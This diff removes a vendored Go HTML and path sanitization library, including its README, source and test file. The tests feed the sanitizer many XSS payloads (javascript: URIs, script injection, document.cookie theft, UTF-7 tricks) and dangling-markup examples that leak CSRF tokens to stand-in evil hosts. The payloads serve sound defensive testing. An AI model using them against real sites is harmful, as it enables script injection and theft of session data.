@@ -1,22 +0,0 @@ | |||
# Compiled Object files, Static and Dynamic libs (Shared Objects) | |||
*.o | |||
*.a | |||
*.so | |||
# Folders | |||
_obj | |||
_test | |||
# Architecture specific extensions/prefixes | |||
*.[568vq] | |||
[568vq].out | |||
*.cgo1.go | |||
*.cgo2.c | |||
_cgo_defun.c | |||
_cgo_gotypes.go | |||
_cgo_export.* | |||
_testmain.go | |||
*.exe |
@@ -1 +0,0 @@ | |||
language: go |
@@ -1,27 +0,0 @@ | |||
Copyright (c) 2017 Mechanism Design. All rights reserved. | |||
Redistribution and use in source and binary forms, with or without | |||
modification, are permitted provided that the following conditions are | |||
met: | |||
* Redistributions of source code must retain the above copyright | |||
notice, this list of conditions and the following disclaimer. | |||
* Redistributions in binary form must reproduce the above | |||
copyright notice, this list of conditions and the following disclaimer | |||
in the documentation and/or other materials provided with the | |||
distribution. | |||
* Neither the name of Google Inc. nor the names of its | |||
contributors may be used to endorse or promote products derived from | |||
this software without specific prior written permission. | |||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS | |||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT | |||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR | |||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT | |||
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, | |||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT | |||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, | |||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY | |||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT | |||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. |
@@ -1,62 +0,0 @@ | |||
sanitize [![GoDoc](https://godoc.org/github.com/kennygrant/sanitize?status.svg)](https://godoc.org/github.com/kennygrant/sanitize) [![Go Report Card](https://goreportcard.com/badge/github.com/kennygrant/sanitize)](https://goreportcard.com/report/github.com/kennygrant/sanitize) [![CircleCI](https://circleci.com/gh/kennygrant/sanitize.svg?style=svg)](https://circleci.com/gh/kennygrant/sanitize) | |||
======== | |||
Package sanitize provides functions to sanitize html and paths with go (golang). | |||
FUNCTIONS | |||
```go | |||
sanitize.Accents(s string) string | |||
``` | |||
Accents replaces a set of accented characters with ascii equivalents. | |||
```go | |||
sanitize.BaseName(s string) string | |||
``` | |||
BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. Unlike Name no attempt is made to normalise text as a path. | |||
```go | |||
sanitize.HTML(s string) string | |||
``` | |||
HTML strips html tags with a very simple parser, replaces common entities, and escapes < and > in the result. The result is intended to be used as plain text.
```go | |||
sanitize.HTMLAllowing(s string, args...[]string) (string, error) | |||
``` | |||
HTMLAllowing parses html and allows certain tags and attributes from the lists optionally specified by args - args[0] is a list of allowed tags, args[1] is a list of allowed attributes. If either is missing default sets are used.
```go | |||
sanitize.Name(s string) string | |||
``` | |||
Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters. | |||
```go | |||
sanitize.Path(s string) string | |||
``` | |||
Path makes a string safe to use as an url path. | |||
Changes | |||
Version 1.2 | |||
Adjusted HTML function to avoid linter warning | |||
Added more tests from https://githubengineering.com/githubs-post-csp-journey/ | |||
Changed name of license file
Added badges and change log to readme | |||
Version 1.1 | |||
Fixed typo in comments.
Merge pull request from Povilas Balzaravicius Pawka | |||
- replace br tags with newline even when they contain a space | |||
Version 1.0 | |||
First release |
@@ -1,383 +0,0 @@ | |||
// Package sanitize provides functions for sanitizing text. | |||
package sanitize | |||
import ( | |||
"bytes" | |||
"html" | |||
"html/template" | |||
"io" | |||
"path" | |||
"regexp" | |||
"strings" | |||
parser "golang.org/x/net/html" | |||
) | |||
var (
	// ignoreTags lists the elements that are dropped together with everything
	// nested inside them.
	ignoreTags = []string{
		"title", "script", "style", "iframe", "frame", "frameset",
		"noframes", "noembed", "embed", "applet", "object", "base",
	}

	// defaultTags is the set of tags allowed when the caller supplies no list.
	defaultTags = []string{
		"h1", "h2", "h3", "h4", "h5", "h6",
		"div", "span", "hr", "p", "br",
		"b", "i", "strong", "em",
		"ol", "ul", "li",
		"a", "img", "pre", "code", "blockquote",
	}

	// defaultAttributes is the set of attributes allowed when the caller
	// supplies no list.
	defaultAttributes = []string{
		"id", "class", "src", "href", "title", "alt", "name", "rel",
	}
)
// HTMLAllowing sanitizes html, allowing some tags. | |||
// Arrays of allowed tags and allowed attributes may optionally be passed as the second and third arguments. | |||
func HTMLAllowing(s string, args ...[]string) (string, error) { | |||
allowedTags := defaultTags | |||
if len(args) > 0 { | |||
allowedTags = args[0] | |||
} | |||
allowedAttributes := defaultAttributes | |||
if len(args) > 1 { | |||
allowedAttributes = args[1] | |||
} | |||
// Parse the html | |||
tokenizer := parser.NewTokenizer(strings.NewReader(s)) | |||
buffer := bytes.NewBufferString("") | |||
ignore := "" | |||
for { | |||
tokenType := tokenizer.Next() | |||
token := tokenizer.Token() | |||
switch tokenType { | |||
case parser.ErrorToken: | |||
err := tokenizer.Err() | |||
if err == io.EOF { | |||
return buffer.String(), nil | |||
} | |||
return "", err | |||
case parser.StartTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = cleanAttributes(token.Attr, allowedAttributes) | |||
buffer.WriteString(token.String()) | |||
} else if includes(ignoreTags, token.Data) { | |||
ignore = token.Data | |||
} | |||
case parser.SelfClosingTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = cleanAttributes(token.Attr, allowedAttributes) | |||
buffer.WriteString(token.String()) | |||
} else if token.Data == ignore { | |||
ignore = "" | |||
} | |||
case parser.EndTagToken: | |||
if len(ignore) == 0 && includes(allowedTags, token.Data) { | |||
token.Attr = []parser.Attribute{} | |||
buffer.WriteString(token.String()) | |||
} else if token.Data == ignore { | |||
ignore = "" | |||
} | |||
case parser.TextToken: | |||
// We allow text content through, unless ignoring this entire tag and its contents (including other tags) | |||
if ignore == "" { | |||
buffer.WriteString(token.String()) | |||
} | |||
case parser.CommentToken: | |||
// We ignore comments by default | |||
case parser.DoctypeToken: | |||
// We ignore doctypes by default - html5 does not require them and this is intended for sanitizing snippets of text | |||
default: | |||
// We ignore unknown token types by default | |||
} | |||
} | |||
} | |||
// HTML strips html tags from s, translates entities to plain text, and escapes
// the result so that it can be used as plain text.
//
// Tags are removed by a deliberately simple scanner: everything between a '<'
// and the next '>' is dropped, so an unterminated '<' discards the rest of the
// input. Closing paragraph tags and br tags become newlines; newlines already
// present in the input are removed first.
//
// Note the returned text may still contain entities: it is escaped with
// template.HTMLEscapeString, and only quotes and an ampersand followed by a
// space are translated back afterwards.
func HTML(s string) (output string) {
	output = s

	// Strings without angle brackets cannot contain tags, so skip the stripping.
	if strings.ContainsAny(s, "<>") {
		// First remove line breaks etc as these have no meaning outside html tags (except pre)
		// this means pre sections will lose formatting... but will result in less unintentional paras.
		s = strings.Replace(s, "\n", "", -1)

		// Then replace line breaks with newlines, to preserve that formatting
		s = strings.Replace(s, "</p>", "\n", -1)
		s = strings.Replace(s, "<br>", "\n", -1)
		s = strings.Replace(s, "</br>", "\n", -1)
		s = strings.Replace(s, "<br/>", "\n", -1)
		s = strings.Replace(s, "<br />", "\n", -1)

		// Walk through the string dropping the angle brackets and everything between them
		var b bytes.Buffer
		inTag := false
		for _, r := range s {
			switch r {
			case '<':
				inTag = true
			case '>':
				inTag = false
			default:
				if !inTag {
					b.WriteRune(r)
				}
			}
		}
		output = b.String()
	}

	// Replace a few common harmless entities with ascii, to arrive at something
	// more like plain text. This happens before UnescapeString so that curly
	// quotes and non-breaking spaces become plain quotes and spaces rather than
	// their unicode equivalents.
	output = strings.Replace(output, "&#8216;", "'", -1)
	output = strings.Replace(output, "&#8217;", "'", -1)
	output = strings.Replace(output, "&#8220;", "\"", -1)
	output = strings.Replace(output, "&#8221;", "\"", -1)
	output = strings.Replace(output, "&nbsp;", " ", -1)
	output = strings.Replace(output, "&quot;", "\"", -1)
	output = strings.Replace(output, "&apos;", "'", -1)

	// Translate remaining entities into their plain text equivalent (for example accents, if encoded as entities)
	output = html.UnescapeString(output)

	// In case we have missed any tags above, escape the text - removes <, >, &, ' and ".
	output = template.HTMLEscapeString(output)

	// After processing, restore the harmless characters ', " and a free-standing &
	// which were encoded by HTMLEscapeString
	output = strings.Replace(output, "&#34;", "\"", -1)
	output = strings.Replace(output, "&#39;", "'", -1)
	output = strings.Replace(output, "&amp; ", "& ", -1)     // NB space after
	output = strings.Replace(output, "&amp;amp; ", "& ", -1) // NB space after

	return output
}
// We are very restrictive as this is intended for ascii url slugs | |||
var illegalPath = regexp.MustCompile(`[^[:alnum:]\~\-\./]`) | |||
// Path makes a string safe to use as an url path. | |||
func Path(s string) string { | |||
// Start with lowercase string | |||
filePath := strings.ToLower(s) | |||
filePath = strings.Replace(filePath, "..", "", -1) | |||
filePath = path.Clean(filePath) | |||
// Remove illegal characters for paths, flattening accents and replacing some common separators with - | |||
filePath = cleanString(filePath, illegalPath) | |||
// NB this may be of length 0, caller must check | |||
return filePath | |||
} | |||
// Remove all other unrecognised characters apart from | |||
var illegalName = regexp.MustCompile(`[^[:alnum:]-.]`) | |||
// Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters. | |||
func Name(s string) string { | |||
// Start with lowercase string | |||
fileName := strings.ToLower(s) | |||
fileName = path.Clean(path.Base(fileName)) | |||
// Remove illegal characters for names, replacing some common separators with - | |||
fileName = cleanString(fileName, illegalName) | |||
// NB this may be of length 0, caller must check | |||
return fileName | |||
} | |||
// Replace these separators with - | |||
var baseNameSeparators = regexp.MustCompile(`[./]`) | |||
// BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. | |||
// No attempt is made to normalise a path or normalise case. | |||
func BaseName(s string) string { | |||
// Replace certain joining characters with a dash | |||
baseName := baseNameSeparators.ReplaceAllString(s, "-") | |||
// Remove illegal characters for names, replacing some common separators with - | |||
baseName = cleanString(baseName, illegalName) | |||
// NB this may be of length 0, caller must check | |||
return baseName | |||
} | |||
// transliterations maps accented runes to an ascii replacement string.
// It is a very limited list intended to catch common european names translated
// to urls, and could be expanded with many more characters.
var transliterations = map[rune]string{
	// Upper case
	'À': "A",
	'Á': "A",
	'Â': "A",
	'Ã': "A",
	'Ä': "A",
	'Å': "AA",
	'Æ': "AE",
	'Ç': "C",
	'È': "E",
	'É': "E",
	'Ê': "E",
	'Ë': "E",
	'Ì': "I",
	'Í': "I",
	'Î': "I",
	'Ï': "I",
	'Ð': "D",
	'Ł': "L",
	'Ñ': "N",
	'Ò': "O",
	'Ó': "O",
	'Ô': "O",
	'Õ': "O",
	'Ö': "O",
	'Ø': "OE",
	'Ù': "U",
	'Ú': "U",
	'Ü': "U",
	'Û': "U",
	'Ý': "Y",
	'Þ': "Th",

	// Lower case
	'ß': "ss",
	'à': "a",
	'á': "a",
	'â': "a",
	'ã': "a",
	'ä': "a",
	'å': "aa",
	'æ': "ae",
	'ç': "c",
	'è': "e",
	'é': "e",
	'ê': "e",
	'ë': "e",
	'ì': "i",
	'í': "i",
	'î': "i",
	'ï': "i",
	'ð': "d",
	'ł': "l",
	'ñ': "n",
	'ń': "n",
	'ò': "o",
	'ó': "o",
	'ô': "o",
	'õ': "o",
	'ō': "o",
	'ö': "o",
	'ø': "oe",
	'ś': "s",
	'ù': "u",
	'ú': "u",
	'û': "u",
	'ū': "u",
	'ü': "u",
	'ý': "y",
	'þ': "th",
	'ÿ': "y",
	'ż': "z",

	// Ligatures
	'Œ': "OE",
	'œ': "oe",
}

// Accents replaces a set of accented characters with ascii equivalents.
// Runes without an entry in transliterations are copied through unchanged.
func Accents(s string) string {
	var out bytes.Buffer
	for _, r := range s {
		ascii, found := transliterations[r]
		if !found {
			out.WriteRune(r)
			continue
		}
		out.WriteString(ascii)
	}
	return out.String()
}
var ( | |||
// If the attribute contains data: or javascript: anywhere, ignore it | |||
// we don't allow this in attributes as it is so frequently used for xss | |||
// NB we allow spaces in the value, and lowercase. | |||
illegalAttr = regexp.MustCompile(`(d\s*a\s*t\s*a|j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*)\s*:`) | |||
// We are far more restrictive with href attributes. | |||
legalHrefAttr = regexp.MustCompile(`\A[/#][^/\\]?|mailto://|http://|https://`) | |||
) | |||
// cleanAttributes returns an array of attributes after removing malicious ones. | |||
func cleanAttributes(a []parser.Attribute, allowed []string) []parser.Attribute { | |||
if len(a) == 0 { | |||
return a | |||
} | |||
var cleaned []parser.Attribute | |||
for _, attr := range a { | |||
if includes(allowed, attr.Key) { | |||
val := strings.ToLower(attr.Val) | |||
// Check for illegal attribute values | |||
if illegalAttr.FindString(val) != "" { | |||
attr.Val = "" | |||
} | |||
// Check for legal href values - / mailto:// http:// or https:// | |||
if attr.Key == "href" { | |||
if legalHrefAttr.FindString(val) == "" { | |||
attr.Val = "" | |||
} | |||
} | |||
// If we still have an attribute, append it to the array | |||
if attr.Val != "" { | |||
cleaned = append(cleaned, attr) | |||
} | |||
} | |||
} | |||
return cleaned | |||
} | |||
// A list of characters we consider separators in normal strings and replace with our canonical separator - rather than removing. | |||
var ( | |||
separators = regexp.MustCompile(`[ &_=+:]`) | |||
dashes = regexp.MustCompile(`[\-]+`) | |||
) | |||
// cleanString replaces separators with - and removes characters listed in the regexp provided from string. | |||
// Accents, spaces, and all characters not in A-Za-z0-9 are replaced. | |||
func cleanString(s string, r *regexp.Regexp) string { | |||
// Remove any trailing space to avoid ending on - | |||
s = strings.Trim(s, " ") | |||
// Flatten accents first so that if we remove non-ascii we still get a legible name | |||
s = Accents(s) | |||
// Replace certain joining characters with a dash | |||
s = separators.ReplaceAllString(s, "-") | |||
// Remove all other unrecognised characters - NB we do allow any printable characters | |||
s = r.ReplaceAllString(s, "") | |||
// Remove any multiple dashes caused by replacements above | |||
s = dashes.ReplaceAllString(s, "-") | |||
return s | |||
} | |||
// includes reports whether s is exactly equal to one of the elements of a.
func includes(a []string, s string) bool {
	for i := 0; i < len(a); i++ {
		if a[i] == s {
			return true
		}
	}
	return false
}
@@ -1,233 +0,0 @@ | |||
// Tests and benchmarks for the sanitize functions.
package sanitize | |||
import ( | |||
"testing" | |||
) | |||
// Format is the failure message layout shared by the tests; it takes the
// input, the expected output and the actual output, in that order.
var Format = "\ninput: %q\nexpected: %q\noutput: %q"

// Test is a single table entry: an input and the output expected for it.
type Test struct {
	input, expected string
}
// NB the treatment of accents - they are removed and replaced with ascii transliterations | |||
var urls = []Test{ | |||
{"ReAd ME.md", `read-me.md`}, | |||
{"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`}, | |||
{"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`}, | |||
{"/../../4-icon.jpg", `/4-icon.jpg`}, | |||
{"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`}, | |||
{"../4 icon.*", `/4-icon.`}, | |||
{"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`}, | |||
{"../*", `/`}, | |||
} | |||
func TestPath(t *testing.T) { | |||
for _, test := range urls { | |||
output := Path(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkPath(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range urls { | |||
output := Path(test.input) | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} | |||
var fileNames = []Test{ | |||
{"ReAd ME.md", `read-me.md`}, | |||
{"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`}, | |||
{"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`}, | |||
{"/../../4-icon.jpg", `4-icon.jpg`}, | |||
{"/Images/../4-icon.jpg", `4-icon.jpg`}, | |||
{"../4 icon.jpg", `4-icon.jpg`}, | |||
{"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`}, | |||
} | |||
func TestName(t *testing.T) { | |||
for _, test := range fileNames { | |||
output := Name(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkName(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range fileNames { | |||
output := Name(test.input) | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} | |||
var baseFileNames = []Test{ | |||
{"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`}, | |||
{"/../../4-iCoN.jpg", `-4-iCoN-jpg`}, | |||
{"And/Or", `And-Or`}, | |||
{"Sonic.EXE", `Sonic-EXE`}, | |||
{"012: #Fetch for Defaults", `012-Fetch-for-Defaults`}, | |||
} | |||
func TestBaseName(t *testing.T) { | |||
for _, test := range baseFileNames { | |||
output := BaseName(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
// Test with some malformed or malicious html | |||
// NB because we remove all tokens after a < until the next > | |||
// and do not attempt to parse, we should be safe from invalid html, | |||
// but will sometimes completely empty the string if we have invalid input | |||
// Note we sometimes use " in order to keep things on one line and use the ` character | |||
var htmlTests = []Test{ | |||
{` `, " "}, | |||
{`&#x000D;`, `&#x000D;`}, | |||
{`<invalid attr="invalid"<,<p><p><p><p><p>`, ``}, | |||
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."}, | |||
{`FOO
ZOO`, "FOO\rZOO"}, | |||
{`<script><!--<script </s`, ``}, | |||
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`}, | |||
{`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`}, | |||
{`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"}, | |||
{`Something<br/>Some more`, "Something\nSome more"}, | |||
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""}, | |||
{`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`}, | |||
{`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`}, | |||
{`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`}, | |||
{`<iframe src="" attr="">>>>>>`, `<iframe src="" attr="">`}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`}, | |||
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, | |||
{`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, | |||
{`<IMG SRC="javascript:alert('XSS')" <test`, ``}, | |||
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``}, | |||
{`> & test <`, `> & test <`}, | |||
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, | |||
{`“hello” it’s for ‘real’`, `"hello" it's for 'real'`}, | |||
{`<IMG SRC=javascript:a& | |||
#0000108ert('XSS')>`, ``}, | |||
{`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, | |||
{"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"}, | |||
// Examples from https://githubengineering.com/githubs-post-csp-journey/ | |||
{`<img src='https://example.com/log_csrf?html=`, ``}, | |||
{`<img src='https://example.com/log_csrf?html= | |||
<form action="https://example.com/account/public_keys/19023812091023"> | |||
... | |||
<input type="hidden" name="csrf_token" value="some_csrf_token_value"> | |||
</form>`, `...`}, | |||
{`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f | |||
<p>secret</p>`, `secret | |||
`}, | |||
{`<form action="https://some-evil-site.com"><button>Click</button><textarea name=' | |||
<!-- </textarea> --><!-- '" --> | |||
<form action="/logout"> | |||
<input name="authenticity_token" type="hidden" value="secret1"> | |||
</form>`, `Click -- `}, | |||
} | |||
func TestHTML(t *testing.T) { | |||
for _, test := range htmlTests { | |||
output := HTML(test.input) | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
var htmlTestsAllowing = []Test{ | |||
{`<IMG SRC="jav
ascript:alert('XSS');">`, `<img>`}, | |||
{`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`}, | |||
{`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`}, | |||
{`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`}, | |||
{`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`}, | |||
{`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, | |||
{`<b>hello world</b>`, `<b>hello world</b>`}, | |||
{`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`}, | |||
{`&#x000D;`, `&#x000D;`}, | |||
{`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`}, | |||
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."}, | |||
{"`FOO
ZOO", "`FOO ZOO"}, | |||
{`<script><!--<script </s`, ``}, | |||
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`}, | |||
{"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?> or <p id=\"0</p\"> or <<><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>"}, | |||
{`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, | |||
{"Something<br/>Some more", `Something<br/>Some more`}, | |||
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.`}, | |||
{"<sender ignore=me>John Smith</sender>", `John Smith`}, | |||
{"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`}, | |||
{"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``}, | |||
{`<iframe src="" attr="">`, `<iframe src="" attr="">`}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, | |||
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`}, | |||
{`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, | |||
{`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>>> `}, | |||
{`> & test <`, `> & test <`}, | |||
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`}, | |||
{`<img src="data:text/javascript;alert('alert');">`, `<img>`}, | |||
{`<iframe src=http://... <`, ``}, | |||
{`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``}, | |||
{`<img src=javascript:alert(document.cookie)>`, `<img>`}, | |||
{`<?php echo('hello world')>`, ``}, | |||
{`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`}, | |||
{`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`}, | |||
{`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`, | |||
`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`}, | |||
{`<a href="javascript:alert('XSS1')" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup');">XSS<a>`}, | |||
{`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write("UNTRUSTED INPUT: " + document.location.hash); >`}, | |||
{`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`}, | |||
{`<IMG SRC=javascript:alert('XSS')>`, `<img>`}, | |||
{`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`}, | |||
{`<IMG SRC="jav	ascript:alert('XSS');">`, `<img>`}, | |||
{`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`}, | |||
{`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC="http://ha.ckers.org/xss.js">`}, | |||
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`}, | |||
{`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, | |||
{`<IMG SRC=javascript:alert('XSS')`, ``}, | |||
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, | |||
{`<IMG SRC=javascript:a& | |||
#0000108ert('XSS')>`, `<img>`}, | |||
} | |||
func TestHTMLAllowed(t *testing.T) { | |||
for _, test := range htmlTestsAllowing { | |||
output, err := HTMLAllowing(test.input) | |||
if err != nil { | |||
t.Fatalf(Format, test.input, test.expected, output, err) | |||
} | |||
if output != test.expected { | |||
t.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
func BenchmarkHTMLAllowed(b *testing.B) { | |||
for i := 0; i < b.N; i++ { | |||
for _, test := range htmlTestsAllowing { | |||
output, err := HTMLAllowing(test.input) | |||
if err != nil { | |||
b.Fatalf(Format, test.input, test.expected, output, err) | |||
} | |||
if output != test.expected { | |||
b.Fatalf(Format, test.input, test.expected, output) | |||
} | |||
} | |||
} | |||
} |